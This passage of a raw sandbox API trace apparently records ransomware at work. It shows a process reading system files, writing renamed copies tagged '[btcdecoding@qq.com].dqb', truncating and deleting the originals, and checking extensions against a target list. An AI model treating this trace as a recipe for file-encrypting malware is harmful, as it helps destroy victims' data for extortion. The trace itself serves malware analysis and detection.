(lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0053.285] lstrlenW (lpString=".dbf") returned 4 [0053.285] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0053.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0053.285] lstrlenW (lpString=".1cd") returned 4 [0053.285] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0053.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0053.285] lstrlenW (lpString=".jpg") returned 4 [0053.285] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0053.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0053.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0053.285] lstrlenW (lpString=".doc") returned 4 [0053.285] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0053.285] lstrlenW (lpString=".docx") returned 5 [0053.285] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0053.285] lstrlenW (lpString=".pdf") returned 4 [0053.285] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0053.285] lstrlenW (lpString=".xls") returned 4 [0053.285] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0053.286] lstrlenW (lpString=".xlsx") returned 5 [0053.286] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0053.286] lstrlenW (lpString=".ppt") returned 4 [0053.286] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0053.286] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0053.286] lstrlenW (lpString=".zip") returned 4 [0053.286] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0053.286] lstrlenW (lpString=".rar") returned 4 [0053.286] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0053.286] lstrlenW (lpString=".bz2") returned 4 [0053.286] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0053.286] lstrlenW (lpString=".7z") returned 3 [0053.286] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0053.286] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0053.286] lstrlenW (lpString=".dbf") returned 4 [0053.286] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0053.286] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0053.286] lstrlenW (lpString=".1cd") returned 4 [0053.286] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0053.286] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT") returned 64 [0053.286] lstrlenW (lpString=".jpg") returned 4 [0053.286] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0053.286] lstrcmpiW (lpString1=".FLT", lpString2=".dqb") returned 1 [0053.286] lstrlenW (lpString="WPGIMP32.FLT") returned 12 [0053.286] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0053.287] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=280448) returned 1 [0053.287] CloseHandle (hObject=0x178) returned 1 [0053.287] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt")) returned 0x20 [0053.287] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0053.287] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0053.287] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.287] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.287] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0053.288] GetLastError () returned 0x0 [0053.288] ReadFile (in: hFile=0x178, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x44780, lpOverlapped=0x0) returned 1 [0053.294] WriteFile (in: hFile=0x214, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0x44790, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0x44790, lpOverlapped=0x0) returned 1 [0053.299] ReadFile (in: hFile=0x178, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.299] WriteFile (in: hFile=0x214, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.299] SetEndOfFile (hFile=0x214) returned 1 [0053.299] CloseHandle (hObject=0x214) returned 1 [0053.300] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.300] SetEndOfFile (hFile=0x178) returned 1 [0053.303] CloseHandle (hObject=0x178) returned 1 [0053.303] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0053.303] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\wpgimp32.flt")) returned 1 [0053.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0053.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0053.303] lstrlenW (lpString=".doc") returned 4 [0053.303] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0053.303] lstrlenW (lpString=".docx") returned 5 [0053.303] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0053.303] lstrlenW (lpString=".pdf") returned 4 [0053.303] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0053.303] lstrlenW (lpString=".xls") returned 4 [0053.303] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0053.303] lstrlenW (lpString=".xlsx") returned 5 [0053.303] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0053.303] lstrlenW (lpString=".ppt") returned 4 [0053.303] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0053.303] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0053.303] lstrlenW (lpString=".zip") returned 4 [0053.303] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0053.303] lstrlenW (lpString=".rar") returned 4 [0053.304] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0053.304] lstrlenW (lpString=".bz2") returned 4 [0053.304] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0053.304] lstrlenW (lpString=".7z") returned 3 [0053.304] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0053.304] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0053.304] lstrlenW (lpString=".dbf") returned 4 [0053.304] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0053.304] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0053.304] lstrlenW (lpString=".1cd") returned 4 [0053.304] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0053.304] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0053.304] lstrlenW (lpString=".jpg") returned 4 [0053.304] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0053.304] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0053.304] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0053.304] lstrlenW (lpString=".doc") returned 4 [0053.304] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0053.304] lstrlenW (lpString=".docx") returned 5 [0053.304] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0053.304] lstrlenW (lpString=".pdf") returned 4 [0053.304] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0053.304] lstrlenW (lpString=".xls") returned 4 [0053.304] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0053.304] lstrlenW (lpString=".xlsx") returned 5 [0053.304] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0053.304] lstrlenW (lpString=".ppt") returned 4 [0053.304] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0053.304] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0053.304] lstrlenW (lpString=".zip") returned 4 [0053.304] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0053.304] lstrlenW (lpString=".rar") returned 4 [0053.304] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0053.304] lstrlenW (lpString=".bz2") returned 4 [0053.305] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0053.305] lstrlenW (lpString=".7z") returned 3 [0053.305] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0053.305] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0053.305] lstrlenW (lpString=".dbf") returned 4 [0053.305] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0053.305] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0053.305] lstrlenW (lpString=".1cd") returned 4 [0053.305] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0053.305] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT") returned 67 [0053.305] lstrlenW (lpString=".jpg") returned 4 [0053.305] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0053.305] lstrcmpiW (lpString1=".dll", lpString2=".dqb") returned -1 [0053.305] lstrlenW (lpString="hxds.dll") returned 8 [0053.305] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0054.598] GetFileSizeEx (in: hFile=0x240, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=1257984) returned 1 [0054.598] CloseHandle (hObject=0x240) returned 1 [0054.598] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll")) returned 0x20 [0054.598] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0054.598] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0054.598] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.598] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.598] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0054.599] GetLastError () returned 0x0 [0054.599] ReadFile (in: hFile=0x240, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0054.650] WriteFile (in: hFile=0x214, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0054.666] ReadFile (in: hFile=0x240, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x33210, lpOverlapped=0x0) returned 1 [0054.993] WriteFile (in: hFile=0x214, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0x33220, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0x33220, lpOverlapped=0x0) returned 1 [0054.999] ReadFile (in: hFile=0x240, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x0, lpOverlapped=0x0) returned 1 [0054.999] WriteFile (in: hFile=0x214, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0054.999] SetEndOfFile (hFile=0x214) returned 1 [0054.999] CloseHandle (hObject=0x214) returned 1 [0054.999] SetFilePointerEx (in: hFile=0x240, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.999] SetEndOfFile (hFile=0x240) returned 1 [0055.001] CloseHandle (hObject=0x240) returned 1 [0055.001] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.001] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\hxds.dll")) returned 1 [0055.002] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0055.002] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0055.002] lstrlenW (lpString=".doc") returned 4 [0055.002] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0055.002] lstrlenW (lpString=".docx") returned 5 [0055.002] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0055.002] lstrlenW (lpString=".pdf") returned 4 [0055.002] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0055.002] lstrlenW (lpString=".xls") returned 4 [0055.002] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0055.002] lstrlenW (lpString=".xlsx") returned 5 [0055.002] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0055.002] lstrlenW (lpString=".ppt") returned 4 [0055.002] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0055.002] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0055.002] lstrlenW (lpString=".zip") returned 4 [0055.002] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0055.002] lstrlenW (lpString=".rar") returned 4 [0055.002] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0055.002] lstrlenW (lpString=".bz2") returned 4 [0055.002] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0055.002] lstrlenW (lpString=".7z") returned 3 [0055.002] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0055.002] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0055.002] lstrlenW (lpString=".dbf") returned 4 [0055.002] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0055.002] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0055.002] lstrlenW (lpString=".1cd") returned 4 [0055.002] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0055.002] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0055.002] lstrlenW (lpString=".jpg") returned 4 [0055.002] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0055.002] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0055.003] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0055.003] lstrlenW (lpString=".doc") returned 4 [0055.003] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0055.003] lstrlenW (lpString=".docx") returned 5 [0055.003] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0055.003] lstrlenW (lpString=".pdf") returned 4 [0055.003] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0055.003] lstrlenW (lpString=".xls") returned 4 [0055.003] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0055.003] lstrlenW (lpString=".xlsx") returned 5 [0055.003] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0055.003] lstrlenW (lpString=".ppt") returned 4 [0055.003] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0055.003] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0055.003] lstrlenW (lpString=".zip") returned 4 [0055.003] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0055.003] lstrlenW (lpString=".rar") returned 4 [0055.003] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0055.003] lstrlenW (lpString=".bz2") returned 4 [0055.003] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0055.003] lstrlenW (lpString=".7z") returned 3 [0055.003] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0055.003] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0055.003] lstrlenW (lpString=".dbf") returned 4 [0055.003] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0055.003] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0055.003] lstrlenW (lpString=".1cd") returned 4 [0055.003] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0055.003] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\hxds.dll") returned 60 [0055.003] lstrlenW (lpString=".jpg") returned 4 [0055.003] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0055.003] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0055.004] lstrlenW (lpString="OARPMANR.DLL") returned 12 [0055.004] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0055.887] GetFileSizeEx (in: hFile=0x168, lpFileSize=0x303ff1c | out: lpFileSize=0x303ff1c*=11656) returned 1 [0055.887] CloseHandle (hObject=0x168) returned 1 [0055.887] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll")) returned 0x20 [0055.887] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0055.887] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0055.888] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.888] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.888] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0055.888] GetLastError () returned 0x0 [0055.888] ReadFile (in: hFile=0x168, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x2d88, lpOverlapped=0x0) returned 1 [0055.891] WriteFile (in: hFile=0x214, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0x2d90, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0x2d90, lpOverlapped=0x0) returned 1 [0055.892] ReadFile (in: hFile=0x168, lpBuffer=0x3b90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x303fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesRead=0x303fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.892] WriteFile (in: hFile=0x214, lpBuffer=0x3b90020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x303fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b90020*, lpNumberOfBytesWritten=0x303fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.892] SetEndOfFile (hFile=0x214) returned 1 [0055.892] CloseHandle (hObject=0x214) returned 1 [0055.892] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x303fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.892] SetEndOfFile (hFile=0x168) returned 1 [0055.893] CloseHandle (hObject=0x168) returned 1 [0055.893] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.894] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll")) returned 1 [0055.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0055.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0055.894] lstrlenW (lpString=".doc") returned 4 [0055.894] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0055.894] lstrlenW (lpString=".docx") returned 5 [0055.894] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0055.894] lstrlenW (lpString=".pdf") returned 4 [0055.894] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0055.894] lstrlenW (lpString=".xls") returned 4 [0055.894] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0055.894] lstrlenW (lpString=".xlsx") returned 5 [0055.894] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0055.894] lstrlenW (lpString=".ppt") returned 4 [0055.894] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0055.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0055.894] lstrlenW (lpString=".zip") returned 4 [0055.894] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0055.894] lstrlenW (lpString=".rar") returned 4 [0055.894] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0055.894] lstrlenW (lpString=".bz2") returned 4 [0055.894] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0055.894] lstrlenW (lpString=".7z") returned 3 [0055.894] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0055.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0055.894] lstrlenW (lpString=".dbf") returned 4 [0055.894] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0055.894] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73 [0055.894] lstrlenW (lpString=".1cd") returned 4 [0055.895] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0055.895] lstrlenW 